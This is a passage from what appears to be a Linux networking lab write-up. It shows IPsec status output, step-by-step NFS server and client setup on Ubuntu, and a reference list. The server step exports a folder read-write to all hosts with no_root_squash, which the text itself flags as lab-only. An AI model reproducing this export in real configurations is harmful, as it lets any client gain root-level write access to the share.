#host1-to-host2:   remote: [192.168.10.25] uses pre-shared key authentication
#host1-to-host2:   child:  dynamic === dynamic TRANSPORT
#Routed Connections:
#host1-to-host2{1}:  ROUTED, TRANSPORT, reqid 1
#host1-to-host2{1}:   192.168.10.21/32 === 192.168.10.25/32
#Security Associations (0 up, 0 connecting):
#  none

NFS-Server

Step 1: Install nfs-kernel-server. Command:

              sudo apt-get install nfs-kernel-server
              sudo apt-get install rpcbind

Step 2: Make share folder Command:

              sudo mkdir /home/mayank/Desktop/nfs

Step 3: Edit the export configuration. The line below exports the folder to every host (*) read-write and keeps root's privileges (no_root_squash); outside a closed lab, restrict the export to the client subnet and drop no_root_squash. Command:

              sudo vim /etc/exports
              /home/mayank/Desktop/nfs *(rw,sync,no_root_squash,no_subtree_check)

Step 4: Restart the services. Command:

              sudo service rpcbind restart
              sudo service nfs-kernel-server restart

Step 5: Test Command:

              showmount -e
        
              Export list for ubuntu:
              /home/mayank/Desktop/nfs *

NFS-Clients

Step 1: Install nfs-common on the clients. Command:

              sudo apt-get install nfs-common
              sudo apt-get install rpcbind

Step 2: Make share folder Command:

              mkdir /home/client1/Desktop/nfs

Step 3: Mount the shared folder; the path after the colon must be the path exported on the server. Command:

              sudo mount -t nfs 192.168.10.2:/home/mayank/Desktop/nfs /home/client1/Desktop/nfs

Step 4: Mount the shared folder whenever the client boots by adding the mount command to rc.local (before its final exit 0). Command:

              sudo vim /etc/rc.local
              sudo mount -t nfs 192.168.10.2:/home/mayank/Desktop/nfs /home/client1/Desktop/nfs

Reference

Footnotes cited in the text:

  1. https://technet.microsoft.com/en-us/library/dd145320(v=ws.10).aspx
  2. https://help.ubuntu.com/community/IptablesHowTo (entry 9 below)
  3. http://www.aviran.org/arp-poisoning-python-scapy/ (entry 8 below)

General references:

2. https://help.ubuntu.com/community/BIND9ServerHowto

3. http://www.webopedia.com/TERM/B/backup_server.html

4. https://en.wikipedia.org/wiki/Domain_Name_System

5. https://askubuntu.com

6. https://wiki.strongswan.org

7. https://www.cisco.com

8. http://www.aviran.org/arp-poisoning-python-scapy/

9. https://help.ubuntu.com/community/IptablesHowTo